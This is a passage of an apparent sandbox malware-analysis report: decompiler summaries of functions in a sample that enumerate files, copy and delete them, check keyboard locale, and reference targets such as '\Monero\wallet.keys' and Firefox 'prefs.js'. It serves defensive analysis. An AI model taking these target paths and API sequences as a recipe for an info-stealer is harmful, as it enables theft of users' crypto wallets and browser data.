                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                              • Instruction ID: c1bc3b5fd5c4d88c95ce331c0a0ddd6713bcac0c0c49da5cba9c7e3adda84f7a
                              • Opcode Fuzzy Hash: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                              • Instruction Fuzzy Hash: 59E1CF72951118AAEB54FB60DC52FEE7338EFD4304F404599B50A62192EF306F8ACF56
                              Function 0093F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009515B8,00950D96), ref: 0093F71E
                              • StrCmpCA.SHLWAPI(?,009515BC), ref: 0093F76F
                              • StrCmpCA.SHLWAPI(?,009515C0), ref: 0093F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0093FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                              • Instruction ID: 06262b907ada2e9d7e2a68509d8d0cc80a6ae24f786b7349520b994568c3e59f
                              • Opcode Fuzzy Hash: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                              • Instruction Fuzzy Hash: BDB1F0719502189BDB24EF64DC96FEE7379AFD4304F4085A8A40A97291EF306B49CF92
                              Function 00D03942 Relevance: 15.4, Strings: 11, Instructions: 1608COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: o/$#{$)i~;$*e|>$A9$G{$jrw$p2{n$s`|${Gc$-a
                              • API String ID: 0-2774155213
                              • Opcode ID: dc50b4834ec0bf768bd7da747fcb484fb610efb839227251197f2d48f3a79054
                              • Instruction ID: 3d4c2d43399a9ff8a4e30ab7f603f8a4218084eecaf6c4a6d10292db86cf5ad5
                              • Opcode Fuzzy Hash: dc50b4834ec0bf768bd7da747fcb484fb610efb839227251197f2d48f3a79054
                              • Instruction Fuzzy Hash: 80B229F3A082009FE7046E2DEC8567AFBE9EFD4720F1A463DEAC4C3744E53598058696
                              Function 009316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0095510C,?,?,?,009551B4,?,?,00000000,?,00000000), ref: 00931923
                              • StrCmpCA.SHLWAPI(?,0095525C), ref: 00931973
                              • StrCmpCA.SHLWAPI(?,00955304), ref: 00931989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00931D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00931DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00931E20
                              • FindClose.KERNEL32(000000FF), ref: 00931E32
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                              • Instruction ID: 8f49c196bfd66fb8b2588734b0d06a5cf148757edef77a5be472efd8fcea1087
                              • Opcode Fuzzy Hash: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                              • Instruction Fuzzy Hash: 61122071950118ABEB29FB60CC96FEE7378EF94304F414599B50A62191EF306F89CFA1
                              Function 0093DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00950C2E), ref: 0093DE5E
                              • StrCmpCA.SHLWAPI(?,009514C8), ref: 0093DEAE
                              • StrCmpCA.SHLWAPI(?,009514CC), ref: 0093DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0093E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                              • Instruction ID: 9575d49eea3461f11a1de5316233e31917534f3dea1efdad2fedb669aef7fb54
                              • Opcode Fuzzy Hash: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                              • Instruction Fuzzy Hash: B6F19D719541189AEB29EB60DC95FEE7338FF94304F8141D9B40A62191EF306F8ACF66
                              Function 0093DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009514B0,00950C2A), ref: 0093DAEB
                              • StrCmpCA.SHLWAPI(?,009514B4), ref: 0093DB33
                              • StrCmpCA.SHLWAPI(?,009514B8), ref: 0093DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0093DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                              • Instruction ID: c010cc819bab9768bb3179c51ec93cdcb64036219b001587016220d244e3409d
                              • Opcode Fuzzy Hash: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                              • Instruction Fuzzy Hash: 23912072900104ABDB14FBB0EC96EED737DABC4304F408668F91A96191EE349B59CF92
                              Function 00CFB0E7 Relevance: 13.0, Strings: 9, Instructions: 1754COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'bz'$)\}$9!_#$C(f^$Gdoy$O7/$Pi?|$R]?k$d/N6
                              • API String ID: 0-2577963867
                              • Opcode ID: f4cfc7e43c852c48885497c987356b930fbf63d81f482fc13ac31c830ee97bb9
                              • Instruction ID: cdc8d865c2bd8b627c535adbaa671a299316e9c54f8068a1dd87843fd9c9cae3
                              • Opcode Fuzzy Hash: f4cfc7e43c852c48885497c987356b930fbf63d81f482fc13ac31c830ee97bb9
                              • Instruction Fuzzy Hash: EBC22AF36082049FE304AE2DEC8567AFBE9EFD4720F1A453DE6C5C7744EA3598058692
                              Function 00947B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,009505AF), ref: 00947BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00947BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00947C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00947C62
                              • LocalFree.KERNEL32(00000000), ref: 00947D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                              • Instruction ID: 46afba87aae3706da6a523100a0507fbf639b7dd654981416b19dd0dad0f1259
                              • Opcode Fuzzy Hash: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                              • Instruction Fuzzy Hash: F041397194021CABDB24DB94DC99FEEB3B8FF84705F204199E50A62291DB342F85CFA1
                              Function 00CFEDAF Relevance: 9.9, Strings: 7, Instructions: 1183COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $%r$*f=?$6ko}$>&?$@%~~$[Mn*$y+VQ
                              • API String ID: 0-3763056965
                              • Opcode ID: bf614f563e77f6e51c8bcf124ed347bfda5abaa5a6002ab33853656f698c94d2
                              • Instruction ID: fb28fee13f6cb8c4b8b2dc35779634a31784df4db464badaa94cd9b3c7986555
                              • Opcode Fuzzy Hash: bf614f563e77f6e51c8bcf124ed347bfda5abaa5a6002ab33853656f698c94d2
                              • Instruction Fuzzy Hash: 79722AF3A08204AFE3046E2DEC8567ABBE9EFD4720F1A453DE6C5C3744E63599058692
                              Function 0093E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00950D73), ref: 0093E4A2
                              • StrCmpCA.SHLWAPI(?,009514F8), ref: 0093E4F2
                              • StrCmpCA.SHLWAPI(?,009514FC), ref: 0093E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
